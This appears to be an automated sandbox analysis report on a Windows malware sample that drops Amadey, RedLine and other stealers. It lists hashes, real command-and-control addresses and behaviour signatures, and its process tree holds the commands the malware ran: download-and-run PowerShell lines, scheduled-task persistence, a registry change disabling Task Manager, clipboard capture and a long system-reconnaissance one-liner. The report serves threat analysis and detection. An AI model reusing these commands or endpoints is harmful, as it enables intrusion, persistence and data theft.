Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-06-2024 10:00

General

  • Target

    219ea8880bc0853180b43fd8bf674b81e1de1f73b4dc75f328023500482148ea.exe

  • Size

    1.8MB

  • MD5

    d3506cf793362954f36b7e91edf27871

  • SHA1

    85d608f63a13adfb53d2a2ebef716940f79b6ec8

  • SHA256

    219ea8880bc0853180b43fd8bf674b81e1de1f73b4dc75f328023500482148ea

  • SHA512

    69571797ccdffac07fbfa58afdb6b3fea6b91284c7a6b4ae15e0b6e64938f9d3f37417fb27cf7a203b135d1fc2355c43c39588402719f772761a477eaeae83bd

  • SSDEEP

    49152:uWhmomMAnvVGhvfqzNuUN7e8ZrZhJUELEQEaQMjM+isO61Xl82nY:u+M7nenqMS9XZ2OT11E

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.27.237:13528

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 2 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\219ea8880bc0853180b43fd8bf674b81e1de1f73b4dc75f328023500482148ea.exe
    "C:\Users\Admin\AppData\Local\Temp\219ea8880bc0853180b43fd8bf674b81e1de1f73b4dc75f328023500482148ea.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:464
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:924
      • C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4192
        • C:\Users\Admin\AppData\Local\Temp\6.exe
          "C:\Users\Admin\AppData\Local\Temp\6.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:960
        • C:\Users\Admin\AppData\Local\Temp\7.exe
          "C:\Users\Admin\AppData\Local\Temp\7.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:4764
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5052
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0e573cb8,0x7ffa0e573cc8,0x7ffa0e573cd8
            5⤵
              PID:4676
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
              5⤵
                PID:4060
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4640
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                5⤵
                  PID:3488
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                  5⤵
                    PID:3624
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
                    5⤵
                      PID:3728
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:8
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3836
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
                      5⤵
                        PID:2308
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                        5⤵
                          PID:960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
                          5⤵
                            PID:5768
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
                            5⤵
                              PID:5776
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5924
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,15860903032681028297,17848139076693898410,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1988 /prefetch:2
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1912
                        • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3760
                          • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
                            "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3764
                        • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:668
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4328
                        • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:1344
                        • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • Suspicious use of WriteProcessMemory
                          PID:1300
                          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                            "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1488
                            • C:\Users\Admin\AppData\Local\Temp\1000013001\1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000013001\1.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              PID:1044
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 292
                                6⤵
                                • Program crash
                                PID:1908
                        • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:1948
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd /c ins.bat
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4720
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:2872
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:3636
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3608
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1192
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1532
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2880
                                • C:\Windows\system32\reg.exe
                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                  7⤵
                                  • Modifies registry key
                                  PID:1312
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4948
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4524
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4280
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5508
                            • C:\Windows\system32\schtasks.exe
                              schtasks /query /TN "Cleaner"
                              5⤵
                                PID:4104
                          • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:960
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4144
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 252
                              4⤵
                              • Program crash
                              PID:4776
                          • C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4972
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              4⤵
                                PID:5636
                            • C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:1468
                              • C:\Users\Admin\AppData\Local\Temp\onefile_1468_133636104753410892\stub.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000095001\judit.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2952
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "ver"
                                  5⤵
                                    PID:1912
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                    5⤵
                                      PID:3512
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic csproduct get uuid
                                        6⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3740
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tasklist"
                                      5⤵
                                        PID:3008
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist
                                          6⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1748
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                        5⤵
                                        • Hide Artifacts: Hidden Files and Directories
                                        PID:2740
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                          6⤵
                                          • Views/modifies file attributes
                                          PID:1564
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                        5⤵
                                          PID:1812
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                          5⤵
                                            PID:2032
                                            • C:\Windows\system32\taskkill.exe
                                              taskkill /F /IM chrome.exe
                                              6⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5112
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            5⤵
                                              PID:4324
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                6⤵
                                                • Enumerates processes with tasklist
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:3152
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                              5⤵
                                                PID:1748
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe Get-Clipboard
                                                  6⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4516
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "chcp"
                                                5⤵
                                                  PID:3008
                                                  • C:\Windows\system32\chcp.com
                                                    chcp
                                                    6⤵
                                                      PID:4192
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "chcp"
                                                    5⤵
                                                      PID:4800
                                                      • C:\Windows\system32\chcp.com
                                                        chcp
                                                        6⤵
                                                          PID:2588
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                        5⤵
                                                          PID:1940
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profiles
                                                            6⤵
                                                            • Event Triggered Execution: Netsh Helper DLL
                                                            PID:3808
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                          5⤵
                                                            PID:3972
                                                            • C:\Windows\system32\systeminfo.exe
                                                              systeminfo
                                                              6⤵
                                                              • Gathers system information
                                                              PID:4816
                                                            • C:\Windows\system32\HOSTNAME.EXE
                                                              hostname
                                                              6⤵
                                                                PID:5220
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic logicaldisk get caption,description,providername
                                                                6⤵
                                                                • Collects information from the system
                                                                PID:5232
                                                              • C:\Windows\system32\net.exe
                                                                net user
                                                                6⤵
                                                                  PID:5292
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user
                                                                    7⤵
                                                                      PID:5308
                                                                  • C:\Windows\system32\query.exe
                                                                    query user
                                                                    6⤵
                                                                      PID:5324
                                                                      • C:\Windows\system32\quser.exe
                                                                        "C:\Windows\system32\quser.exe"
                                                                        7⤵
                                                                          PID:5340
                                                                      • C:\Windows\system32\net.exe
                                                                        net localgroup
                                                                        6⤵
                                                                          PID:5360
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 localgroup
                                                                            7⤵
                                                                              PID:5372
                                                                          • C:\Windows\system32\net.exe
                                                                            net localgroup administrators
                                                                            6⤵
                                                                              PID:5392
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 localgroup administrators
                                                                                7⤵
                                                                                  PID:5404
                                                                              • C:\Windows\system32\net.exe
                                                                                net user guest
                                                                                6⤵
                                                                                  PID:5424
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 user guest
                                                                                    7⤵
                                                                                      PID:5436
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net user administrator
                                                                                    6⤵
                                                                                      PID:5492
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 user administrator
                                                                                        7⤵
                                                                                          PID:5504
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic startup get caption,command
                                                                                        6⤵
                                                                                          PID:5624
                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                          tasklist /svc
                                                                                          6⤵
                                                                                          • Enumerates processes with tasklist
                                                                                          PID:5740
                                                                                        • C:\Windows\system32\ipconfig.exe
                                                                                          ipconfig /all
                                                                                          6⤵
                                                                                          • Gathers network information
                                                                                          PID:5844
                                                                                        • C:\Windows\system32\ROUTE.EXE
                                                                                          route print
                                                                                          6⤵
                                                                                            PID:5868
                                                                                          • C:\Windows\system32\ARP.EXE
                                                                                            arp -a
                                                                                            6⤵
                                                                                              PID:5884
                                                                                            • C:\Windows\system32\NETSTAT.EXE
                                                                                              netstat -ano
                                                                                              6⤵
                                                                                              • Gathers network information
                                                                                              PID:5900
                                                                                            • C:\Windows\system32\sc.exe
                                                                                              sc query type= service state= all
                                                                                              6⤵
                                                                                              • Launches sc.exe
                                                                                              PID:5916
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh firewall show state
                                                                                              6⤵
                                                                                              • Modifies Windows Firewall
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              PID:5976
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh firewall show config
                                                                                              6⤵
                                                                                              • Modifies Windows Firewall
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              PID:6076
